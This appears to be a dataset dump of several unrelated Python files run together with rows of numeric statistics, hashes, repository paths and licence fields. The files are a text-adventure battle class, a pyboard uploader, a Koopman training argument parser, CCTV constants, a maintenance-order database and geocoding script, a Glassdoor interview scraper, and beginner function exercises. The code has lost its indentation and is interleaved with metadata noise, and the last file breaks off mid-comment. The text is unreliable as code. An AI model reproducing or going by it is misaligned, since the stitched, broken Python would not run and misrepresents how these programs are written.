\|__|\|__|\|_______|\|__|/ \|_______|\|__| \|__| \|__/__/ /\ __\ \|__| \|_______|\|__| \|__|\|_______|
|__|/ \|__|
By | |_|_| /\_|_._ _ o.__|_ _
|_|_| |/--\|_|_||_)(_)|| ||_(_)\/\/
_/ _/ _/ _/ _/ _/ _/_/_/ _/_/_/_/_/
_/ _/_/_/ _/_/ _/_/_/ _/_/_/ _/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/ _/ _/_/ _/_/ _/_/ _/ _/
_/ _/ _/ _/_/_/_/ _/ _/ _/_/ _/_/_/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/_/_/_/ _/_/ _/ _/ _/ _/ _/
_/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
_/ _/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/_/_/ _/_/_/ _/ _/ _/_/_/ _/_/_/ _/ _/ _/ _/_/_/ _/
'''
try: from adventurelib import Item, say, Bag # importing dependencies
except: from adstrangerlib import Item, say, Bag
from random import choice, randint
import time
__version__ = "0.0.3"
class Character(Item):
'''
The character.'''
def __init__(self, name, desc, hp, dp, powers=None, exp=None):
'''
The character. Do NOT use the variable "character"'''
self.name = name
self.desc = desc
self.hp = hp
self.dp = dp
self.powers = powers
self.exp = exp
self.list = Bag()
class Player(Character):
'''
The player class extends the character.
'''
def __init__(self, name, hp, dp_range, powers=None, exp=None, lvl=None):
self.name = name
self.hp = hp
self.dp = dp_range
self.powers = powers
self.exp = exp
self.lvl = lvl
class Battle():
def __init__(self, lose_msg, win_msg, character_, player_, reset_func,
death_msg="You Died.",
vict_msg="You Won!",
prompt ="Enter a power >",
unknown_power="Choose a valid power"):
'''
lose_msg = messages when the player loses; is a list
win_msg = when the player wins; is a list
character_ = the character the player battles; is a Character object
player_ = the player variable; is a Player object
reset_func = function to reset your game if the player loses the battle.; is a function
'''
self.lose_msg = lose_msg
self.win_msg = win_msg
self.character = character_
self.character_save = character_
self.player = player_
self.reset_func = reset_func
self.death_msg = death_msg
self.vict_msg = vict_msg
self.prompt = prompt
self.unk_power = unknown_power
def start(self):
global player
'''
Starts the battle
'''
self.finished = False # the battle is not finished
while not self.finished:
if self.player.hp <= 0:
say(self.death_msg) # RIP you
self.reset_func() # run the reset function, as it is going to
self.finished = True
self.character.hp = self.character_save.hp
break
elif self.character.hp <= 0: # Oh, yay, now do I have to beat that troll over there?
say(self.vict_msg)
self.finished = True
self.character.hp = self.character_save.hp
break
say(f"You have {self.player.hp} \u2665")
time.sleep(0.5)
#message = choice(choice([self.win_msg, self.lose_msg])) # generate a random message
say(f"You are fighting the {self.character.name}") # yes, I do need to know when I am fighting the
#response = input(f"\u2665 {self.player.hp}\nChoose a power > ")
#if response in self.player.powers:
# say(f'You {response} the {self.character.name}')
# self.character.hp -= self.player.dp
# say(f"The {self.character.name} has now {self.character.hp} health points")
# say(message)
# if message in self.win_msg:
# self.player.hp += self.character.dp
# self.player.hp -= self.character.dp
# say(f"The {self.character.name} fights you back and you lose {self.character.dp} HP")
#else:
# say("Choose a valid power") # yeah, do you really expect me?
self.fighter = choice([self.player, self.character])
time.sleep(0.5)
if self.fighter is self.player:
for power in self.player.powers:
say(f"You have the power to {power}")
time.sleep(0.3)
power = input(self.prompt)
if power in self.player.powers:
self.character.hp -= randint(self.player.dp[0],self.player.dp[1])
say(choice(self.win_msg))
else:
say(self.unk_power)
else:
self.player.hp -= self.character.dp
time.sleep(1)
say(choice(self.lose_msg))
time.sleep(1)
say(f"The {self.character.name} has {self.character.hp} \u2665")
| 50.394366
| 237
| 0.396311
| 560
| 7,156
| 4.242857
| 0.228571
| 0.114899
| 0.044192
| 0.042088
| 0.208333
| 0.196549
| 0.127104
| 0.046296
| 0.046296
| 0.046296
| 0
| 0.007242
| 0.479039
| 7,156
| 141
| 238
| 50.751773
| 0.630097
| 0.546115
| 0
| 0.27027
| 0
| 0
| 0.070381
| 0.013685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.054054
| 0
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcf06799a4c681aefacbbab3bd0c395c6f657a8
| 700
|
py
|
Python
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 1
|
2019-01-26T14:53:36.000Z
|
2019-01-26T14:53:36.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | 3
|
2018-08-05T14:53:55.000Z
|
2019-01-27T11:15:45.000Z
|
led_panel_client/cli/commands.py
|
Glutexo/ledpanel-client
|
c23b5913f4a7727f0a878a4240187fb8c16be034
|
[
"MIT"
] | null | null | null |
from ampy.pyboard import Pyboard
from ampy.files import Files
from .files import led_panel_client, max7219
from os.path import basename
from sys import argv
def put():
"""
Uploads all necessary files to the pyboard.
"""
if len(argv) < 2:
print("Pyboard COM port not specified. Usage: led_panel_client_put /dev/tty.wchusbserial1410")
exit(1)
pyboard_pyboard = Pyboard(argv[1])
pyboard_files = Files(pyboard_pyboard)
files_to_put = led_panel_client() | max7219()
for file_path in files_to_put:
name = basename(file_path)
with open(file_path) as file_object:
data = file_object.read()
pyboard_files.put(name, data)
| 28
| 102
| 0.687143
| 99
| 700
| 4.656566
| 0.454545
| 0.052061
| 0.091106
| 0.091106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.228571
| 700
| 24
| 103
| 29.166667
| 0.825926
| 0.061429
| 0
| 0
| 0
| 0
| 0.132605
| 0.039002
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.294118
| 0
| 0.352941
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcfa558f77ea2152e94c0d489367f3ae1bc234b
| 3,241
|
py
|
Python
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:18.000Z
|
2022-01-30T18:29:30.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 1
|
2021-10-17T20:08:41.000Z
|
2021-10-17T20:08:41.000Z
|
koopman-intro/args.py
|
AbsoluteStratos/blog-code
|
3a8e308d55931b053b8a47268c52d62e0fa16bd8
|
[
"MIT"
] | 2
|
2021-07-30T10:04:20.000Z
|
2021-09-01T00:07:14.000Z
|
'''
Into to deep learning Koopman operators
===
Author: Nicholas Geneva (MIT Liscense)
url: https://nicholasgeneva.com/blog/
github: https://github.com/NickGeneva/blog-code
===
'''
import numpy as np
import random
import argparse
import os, errno, copy, json
import torch
class Parser(argparse.ArgumentParser):
def __init__(self):
super(Parser, self).__init__(description='Read')
self.add_argument('--exp-dir', type=str, default="./koopman", help='directory to save experiments')
self.add_argument('--exp-name', type=str, default="duffing", help='experiment name')
self.add_argument('--model', type=str, default="fcnn", choices=['fcnn'], help='experiment name')
# data
self.add_argument('--ntrain', type=int, default=200, help="number of training data")
self.add_argument('--ntest', type=int, default=5, help="number of training data")
self.add_argument('--stride', type=int, default=10, help="number of time-steps as encoder input")
self.add_argument('--batch-size', type=int, default=16, help='batch size for training')
# training
self.add_argument('--epoch-start', type=int, default=0, help='epoch to start at, will load pre-trained network')
self.add_argument('--epochs', type=int, default=300, help='number of epochs to train')
self.add_argument('--lr', type=float, default=0.001, help='ADAM learning rate')
self.add_argument('--seed', type=int, default=12345, help='manual seed used in PyTorch and Numpy')
# logging
self.add_argument('--plot-freq', type=int, default=25, help='how many epochs to wait before plotting test output')
self.add_argument('--test-freq', type=int, default=5, help='how many epochs to test the model')
self.add_argument('--ckpt-freq', type=int, default=5, help='how many epochs to wait before saving model')
self.add_argument('--notes', type=str, default='')
def mkdirs(self, *directories):
'''
Makes a directory if it does not exist
'''
for directory in list(directories):
try:
os.makedirs(directory)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def parse(self, dirs=True):
'''
Parse program arguements
Args:
dirs (boolean): True to make file directories for predictions and models
'''
args = self.parse_args()
args.run_dir = args.exp_dir + '/' + '{}'.format(args.exp_name) \
+ '/{}_ntrain{}_batch{}_{}'.format(args.model, args.ntrain, args.batch_size, args.notes)
args.ckpt_dir = args.run_dir + '/checkpoints'
args.pred_dir = args.run_dir + "/predictions"
if(dirs):
self.mkdirs(args.run_dir, args.ckpt_dir, args.pred_dir)
# Set random seed
if args.seed is None:
args.seed = random.randint(1, 10000)
random.seed(args.seed)
torch.manual_seed(args.seed)
np.random.seed(seed=args.seed)
if dirs:
with open(args.run_dir + "/args.json", 'w') as args_file:
json.dump(vars(args), args_file, indent=4)
return args
| 41.551282
| 122
| 0.624499
| 428
| 3,241
| 4.630841
| 0.373832
| 0.052977
| 0.113522
| 0.028759
| 0.104945
| 0.097376
| 0.097376
| 0.077699
| 0.038345
| 0.038345
| 0
| 0.012929
| 0.236347
| 3,241
| 78
| 123
| 41.551282
| 0.787879
| 0.11046
| 0
| 0
| 0
| 0
| 0.228033
| 0.008182
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.106383
| 0
| 0.212766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd07ae84271209f560ab1e8af1cb6cd4f30c6a7
| 336
|
py
|
Python
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 10
|
2018-09-05T15:20:05.000Z
|
2020-06-01T03:57:08.000Z
|
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | null | null | null |
server/object_detection/Constants.py
|
KimSangYeon-DGU/Fire_Alarm_CCTV
|
a5dd6c145c898e85bf0c42c03f12cb0415330d74
|
[
"Apache-2.0"
] | 7
|
2019-06-19T05:44:23.000Z
|
2020-08-30T07:26:13.000Z
|
import socket as sock
import os
IP = sock.gethostname()
CCTV_PORT = 9000
ANDR_PORT = 8000
CUR_DIR = os.getcwd()
REC_DIR = os.path.join(CUR_DIR, "record")
DB_ADDR = "Database server address"
PUSH_ADDR = "Push notification server address"
REG_ID = "Registration ID"
NOTIF_COUNT = 4
QUEUE_SIZE = 30
REC_FILE_NUM = 60
NOTIF_MINIUTE = 10
| 18.666667
| 46
| 0.752976
| 55
| 336
| 4.363636
| 0.727273
| 0.05
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052817
| 0.154762
| 336
| 18
| 47
| 18.666667
| 0.792254
| 0
| 0
| 0
| 0
| 0
| 0.225519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd20fab82d3922fc99876b2d016b1c0bd247c6a
| 7,878
|
py
|
Python
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | 2
|
2021-06-08T21:48:56.000Z
|
2021-09-08T02:11:07.000Z
|
sanstitre1.py
|
mrrobotsca/NLP-AI2020
|
ff9c39f3a1d1dd2fbc57d596edf01d0e035d5b59
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 27 14:14:47 2019
@author: DK0086
"""
import odema as od
import numpy as np
from datetime import datetime
import pandas as pd
import geopy.distance
import math
import os
import time
import sys
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent="Dash")
#######################################################################
# 1em Partie :
# Connection a Database des ordre D3 et traitement des donnees
tec=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
sql = "SELECT MVW_BW_AVIS.AVIS, MVW_BW_AVIS.DESCRIPTION, MVW_BW_AVIS.TYP, MVW_BW_AVIS.DATE_AVIS, \
MVW_BW_AVIS.ANNEE_DATE_AVIS, MVW_BW_AVIS.MOIS_DATE_AVIS, MVW_BW_AVIS.STATSYS, MVW_BW_AVIS.STAT_UTIL, \
MVW_BW_AVIS.ORDRE, MVW_BW_ORDRES.DATE_CREATION, MVW_BW_AVIS.POSTETECHNIQUE, MVW_BW_AVIS.CODAGE, \
MVW_BW_AVIS.DIV, MVW_BW_AVIS.RESPONSABLE FROM ODEMA.MVW_BW_AVIS MVW_BW_AVIS LEFT OUTER JOIN ODEMA.MVW_BW_ORDRES MVW_BW_ORDRES ON (MVW_BW_AVIS.ORDRE = MVW_BW_ORDRES.ORDRE)"
div=tec.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
localisation= tec.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
tec['longitude']=lon
tec['latitude']=lat
tec['Division']=divv
tec.index = tec['Division']
df = od.read_odema(sql=sql)
test = df[df['DIV'].isin(divv)].copy()
test['IPOT'] = test['STAT_UTIL'].fillna('').str.contains('IPOT')
test['ANOI'] = test['STAT_UTIL'].fillna('').str.contains('ANOI')
test['AINF'] = test['STAT_UTIL'].fillna('').str.contains('AINF')
test["TYP"] = np.where(test['TYP'] == "D3",
np.where(test['IPOT'],
"D3-IPOT",
np.where(test['AINF'],
'D3-AINF',
np.where(test['ANOI'],
'D3-ANOI',
"D3-AUTRE")
)
),
test['TYP'])
R5=['R01','R02','R03','R04','R05']
R10=['R06','R07','R08','R09','R10']
test['R5_et_moins']=test['CODAGE'].isin(R5)
test['R6_et_plus']=test['CODAGE'].isin(R10)
test = test[test['CODAGE'].isin(R5) | test['CODAGE'].isin(R10)]
test = test[test['TYP'].isin(['D2','D4','D9','D3']) | test['TYP'].str.contains('D3')]
test['TYPE_CODE']=test['TYP']
test["Technicien"] = test["DIV"].map(tec["Techniciens"]).fillna("non-assigne")
test["Désignation"] = test["DIV"].map(tec["Désignation"]).fillna("non-assigne")
test["Territoires"] = test["DIV"].map(tec["Territoires"]).fillna("non-assigne")
test["longitude"] = test["DIV"].map(tec["latitude"]).fillna("non-assigne")
test["latitude"] = test["DIV"].map(tec["longitude"]).fillna("non-assigne")
testcopy = test.copy()
df_ordres = testcopy[testcopy['ORDRE'].notnull()].copy()
testcopy["date"] = testcopy["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
testcopy=testcopy[(testcopy.date.dt.year>=2012)& (testcopy.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
testcopy["TYP"] = testcopy["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
testcopy = testcopy.append(df_ordres)
del testcopy["DATE_AVIS"], testcopy["DATE_CREATION"], testcopy['AINF'], testcopy['ANOI'], testcopy['IPOT'], testcopy['R5_et_moins'], testcopy['R6_et_plus']
test["TYP"] = np.where(test['R5_et_moins'],test['TYP']+"-R5",test['TYP']+"-R10")
df_ordres = test[test['ORDRE'].notnull()].copy()
test["date"] = test["DATE_AVIS"]
df_ordres["date"] = df_ordres["DATE_CREATION"]
test=test[(test.date.dt.year>=2012)& (test.date.dt.year<=2020)]
df_ordres=df_ordres[(df_ordres.date.dt.year>=2012)& (df_ordres.date.dt.year<=2020)]
test["TYP"] = test["TYP"] + "-lances"
df_ordres["TYP"] = df_ordres["TYP"] + "-confirmes"
test = test.append(df_ordres)
del test["DATE_AVIS"], test["DATE_CREATION"],test['AINF'], test['ANOI'], test['IPOT'], test['R5_et_moins'], test['R6_et_plus']
test = test.append(testcopy)
#######################################################################
# 2em Partie :
# Connection a Database des ordre 443 et traitement des donnees
sql_req_443 = \
"SELECT MVW_BW_ORDRES.TYPE, \
MVW_BW_ORDRES.CODE_NATURE, \
MVW_BW_ORDRES.ORDRE, \
MVW_BW_OPERATIONS_SM_PM.OPERATION_SM_PM, \
MVW_BW_ORDRES.DESIGNATION, \
MVW_BW_OPERATIONS_SM_PM.DESIGNATION_OPERATION_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUTS_UTIL_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.STATUT_OP_COMPLET_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_CONF_SM_PM, \
MVW_BW_OPERATIONS_SM_PM.DATE_STATUT_LANC_SM_PM, \
MVW_BW_ORDRES.DIVISION_GRPE_GESTION, \
MVW_BW_ORDRES.DIVISION_POSTE_RESP, \
MVW_BW_ORDRES.POSTERESP \
FROM ODEMA.MVW_BW_ORDRES \
INNER JOIN ODEMA.MVW_BW_OPERATIONS_SM_PM \
ON (MVW_BW_ORDRES.ORDRE = MVW_BW_OPERATIONS_SM_PM.ORDRE_SM_PM) \
WHERE(MVW_BW_ORDRES.CODE_NATURE = '443')"
geolocator = Nominatim(user_agent="Dash")
df443 = od.read_odema(sql=sql_req_443)
df=pd.read_csv(r'Territoire_vs_technicien.csv', sep=";",encoding = "ISO-8859-1" )
div=df.loc[:,'Division'].astype(str)
divv=[]
for row in div:
a=row
if len(a)==3:
a='0'+a
divv.append(a)
else:
divv.append(a)
df['Division']=divv
localisation= df.loc[:,'Désignation']
lon=[]
lat=[]
for row in localisation:
location = geolocator.geocode(row,timeout=15)
print(location.address)
lat.append(location.latitude)
lon.append(location.longitude)
df['longitude']=lon
df['latitude']=lat
df.index = df['Division']
df443['chk'] = df443['DESIGNATION_OPERATION_SM_PM'].fillna('').str.lower().str.replace('é','e')
df443['TYPE_CODE'] = df443['TYPE'] + '-' + df443['CODE_NATURE']
df443['TYPE_CODE'] = np.where(df443['chk'].fillna("").str.contains('diagnostic')
,df443['TYPE_CODE'] + '-' + 'Diagnostic'
,df443['TYPE_CODE'] + '-' + 'Autre'
)
closed = df443[df443['DATE_STATUT_CONF_SM_PM'].notnull()].copy()
df443 = df443[df443['DATE_STATUT_LANC_SM_PM'].notnull()] #pas supposé d'avoir aucun null mais quand même, juste pour être sûr
closed['date'] = closed['DATE_STATUT_CONF_SM_PM']
df443['date'] = df443['DATE_STATUT_LANC_SM_PM']
lst_champs = ['TYPE_CODE','TYPE','CODE_NATURE','ORDRE','DESIGNATION','OPERATION_SM_PM','DESIGNATION_OPERATION_SM_PM','date', 'DIVISION_GRPE_GESTION','DIVISION_POSTE_RESP']
closed = closed[lst_champs]
df443 = df443[lst_champs]
df443['TYP'] = df443['TYPE_CODE'] + '-lances'
closed['TYP'] = closed['TYPE_CODE'] + '-confirmes'
df443 = df443.append(closed)
df443['DIV'] = df443['DIVISION_POSTE_RESP']
df443["Technicien"] = df443["DIV"].map(df["Techniciens"]).fillna("non-assigne")
df443["Désignation"] = df443["DIV"].map(df["Désignation"]).fillna("non-assigne")
df443["Territoires"] = df443["DIV"].map(df["Territoires"]).fillna("non-assigne")
df443["longitude"] = df443["DIV"].map(df["latitude"]).fillna("non-assigne")
df443["latitude"] = df443["DIV"].map(df["longitude"]).fillna("non-assigne")
df443["TYP_STATUS"] = df443["TYP"]
df443['433'] = df443['CODE_NATURE'].fillna('').str.contains('433')
del closed
#tot=pd.concat([df443, test], ignore_index=True)
#tot.to_csv('tot.csv',sep=";")
| 37.514286
| 180
| 0.621351
| 1,058
| 7,878
| 4.405482
| 0.190926
| 0.040764
| 0.030895
| 0.029178
| 0.398198
| 0.304012
| 0.250161
| 0.222055
| 0.214117
| 0.150611
| 0
| 0.039988
| 0.184184
| 7,878
| 209
| 181
| 37.69378
| 0.685234
| 0.046839
| 0
| 0.248366
| 0
| 0.006536
| 0.201092
| 0.030668
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.065359
| 0
| 0.065359
| 0.013072
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd2843c7e52da7b669cdb447daf485dad48b407
| 4,398
|
py
|
Python
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 9
|
2019-05-29T12:53:03.000Z
|
2020-07-01T13:26:12.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2018-07-20T00:23:46.000Z
|
2018-10-16T20:37:34.000Z
|
GlassdoorScrape/GlassdoorScrape/GlassdoorScrapeCore/GlassdoorScrapeInterviews.py
|
tlarsen7572/AlteryxTools
|
4bfaefbf59f7206215f42a6ca5b364f71c35fa1f
|
[
"BSD-2-Clause"
] | 2
|
2019-03-15T13:43:36.000Z
|
2020-04-27T00:15:53.000Z
|
import GlassdoorScrapeCore.GlassdoorScrapeUtilities as Ut
def decode_experience(html_string):
if html_string.find("Positive", 0) != -1:
return "Positive Experience"
elif html_string.find("Neutral", 0) != -1:
return "Neutral Experience"
elif html_string.find("Negative", 0) != -1:
return "Negative Experience"
return ""
def decode_offer(html_string):
if html_string.find("Accepted", 0) != -1:
return "Accepted Offer"
elif html_string.find("Declined", 0) != -1:
return "Declined Offer"
elif html_string.find("No Offer", 0) != -1:
return "No Offer"
return ""
def decode_difficulty(html_string):
if html_string.find("Hard", 0) != -1:
return "Hard"
elif html_string.find("Average", 0) != -1:
return "Average"
elif html_string.find("Easy", 0) != -1:
return "Easy"
elif html_string.find("Difficult", 0) != -1:
return "Difficult"
return ""
def decode_getting_interview(html_string):
html_string = html_string.upper()
if html_string.find(" ONLINE ", 0) != -1:
return "Online"
elif html_string.find("EMPLOY", 0) != -1:
return "Employee Referral"
elif html_string.find("RECRUITING", 0) != -1:
return "Campus Recruiting"
elif html_string.find("CAMPUS", 0) != -1:
return "Campus Recruiting"
return ""
def parse_html(html_string):
company_name = Ut.get_string_between(html_string, "</script><title>", "Interview Questions |", "")
print("Company Name: " + company_name)
interview_list = Ut.get_list_of_substrings(html_string, "<li class=' empReview cf ' id='InterviewReview", "</li>")
if len(interview_list) == 0:
interview_list = Ut.get_list_of_substrings(html_string,
"<li class=' lockedReview empReview cf ' id='InterviewReview_",
"</li>")
print("Interviews to parse: " + str(len(interview_list)))
# Each will have a list appended
output_listing = []
for main_list in range(0, len(interview_list)):
row = interview_list[main_list]
# Parse the current listing
row_list = []
# Company Name
_str = company_name
row_list.append(_str)
# Interview Date
_str = Ut.get_string_between(row, "datetime=\"", "\">", "")
row_list.append(_str)
# Title (Analyst Interview)
_str = Ut.get_string_between(row, "<span class='reviewer'>", "</span>", "")
_str = _str.strip()
row_list.append(_str)
# Experience
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Application</p>", "")
experience = experience.strip()
if len(experience) == 0:
experience = Ut.get_string_between(row, "<div class='flex-grid'>",
"<p class=\"strong margTopMd tightBot\">Interview</p>", "")
_str = decode_experience(experience)
row_list.append(_str)
# Offer
_str = decode_offer(experience)
row_list.append(_str)
# Difficulty
_str = decode_difficulty(experience)
row_list.append(_str)
# GettingInterview
_Application = Ut.get_string_between(row,
"<p class='applicationDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
_current = decode_getting_interview(_Application)
row_list.append(_current)
# Application
row_list.append(_Application)
# Interview (description/verbatim)
_str = Ut.get_string_between(row,
"<p class='interviewDetails mainText truncateThis wrapToggleStr '>",
"</p>", "")
row_list.append(_str)
# Interview (Questions)
_str = Ut.get_string_between(row,
"<span class='interviewQuestion noPadVert truncateThis wrapToggleStr ' data-truncate-words='70'>",
"class", "", True)
row_list.append(_str)
# append the list
output_listing.append(row_list)
return output_listing
| 35.467742
| 135
| 0.571851
| 460
| 4,398
| 5.234783
| 0.226087
| 0.099668
| 0.081395
| 0.074751
| 0.339286
| 0.19892
| 0.155316
| 0.13289
| 0.105482
| 0.105482
| 0
| 0.01083
| 0.307185
| 4,398
| 123
| 136
| 35.756098
| 0.779455
| 0.054116
| 0
| 0.232558
| 0
| 0
| 0.202846
| 0.023396
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05814
| false
| 0
| 0.011628
| 0
| 0.290698
| 0.023256
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afd5a7231c757b5d59c10582041a64bcee61c37a
| 4,155
|
py
|
Python
|
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | null | null | null |
30-Days-of-Python/Day_12.py
|
davidusken/Python
|
56d2103d6be1e7be850ba87a1ba1e113333ddf13
|
[
"MIT"
] | 1
|
2021-02-28T12:52:55.000Z
|
2021-02-28T12:52:55.000Z
|
# Day 12: Functions
# Exercises
# Define four functions: add, subtract, divide, and multiply. Each function should take two arguments, and they should print the result of the arithmetic operation indicated by the function name.
# When orders matters for an operation, the first argument should be treated as the left operand, and the second argument should be treated as the right operand.
# For example, if the user passes in 6 and 2 to subtract, the result should be 4, not -4.
# You should also make sure that the user can’t pass in 0 as the second argument for divide. If the user provides 0, you should print a warning instead of calculating their division.
def add(firstvalue, secondvalue):
print(firstvalue + secondvalue)
def subtract(firstvalue, secondvalue):
print(firstvalue - secondvalue)
def divide(firstvalue, secondvalue):
if secondvalue == 0:
quit("You can't do that!")
print(firstvalue / secondvalue)
def multiply(firstvalue, secondvalue):
print(firstvalue * secondvalue)
# Main (input/menu)
firstvalue = int(input("Enter first value: "))
secondvalue = int(input("Enter second value: "))
userchoice = input("\nWhat operation do you wish to perform?\n1. Add\n2. Subtract\n3. Divide\n4. Multiply\nEnter choice: ")
if userchoice == "1":
add(firstvalue, secondvalue)
elif userchoice == "2":
subtract(firstvalue, secondvalue)
elif userchoice == "3":
divide(firstvalue, secondvalue)
elif userchoice == "4":
multiply(firstvalue, secondvalue)
else:
print("Invalid input, try again.")
# Define a function called print_show_info that has a single parameter. The argument passed to it will be a dictionary with some information about a T.V. show. For example:
# The print_show_info function should print the information stored in the dictionary, in a nice way. For example:
# Breaking Bad (2008) - 5 seasons - Remember you must define your function before calling it!
tv_show = {
"title": "Breaking Bad",
"seasons": 5,
"initial_release": 2008
}
def print_show_info(show):
print(f"{show['title']} ({show['initial_release']}) - {show['seasons']} seasons")
print_show_info(tv_show)
# Below you’ll find a list containing details about multiple TV series.
series = [
{"title": "Breaking Bad", "seasons": 5, "initial_release": 2008},
{"title": "Fargo", "seasons": 4, "initial_release": 2014},
{"title": "Firefly", "seasons": 1, "initial_release": 2002},
{"title": "Rick and Morty", "seasons": 4, "initial_release": 2013},
{"title": "True Detective", "seasons": 3, "initial_release": 2014},
{"title": "Westworld", "seasons": 3, "initial_release": 2016},
]
# Use your function, print_show_info, and a for loop, to iterate over the series list, and call your function once for each iteration, passing in each dictionary.
# You should end up with each series printed in the appropriate format.
for show in series:
print_show_info(show)
# Create a function to test if a word is a palindrome. A palindrome is a string of characters that are identical whether read forwards or backwards. For example, “was it a car or a cat I saw” is a palindrome.
# In the day 7 project, we saw a number of ways to reverse a sequence, and you can use this to verify whether a string is the same backwards as it is in its original order. You can also use a slicing approach.
# Once you’ve found whether or not a word is a palindrome, you should print the result to the user. Make sure to clean up the argument provided to the function. We should be stripping whitespace from both
# ends of the string, and we should convert it all to the same case, just in case we’re dealing with a name, like “Hannah”.
# Vars needed
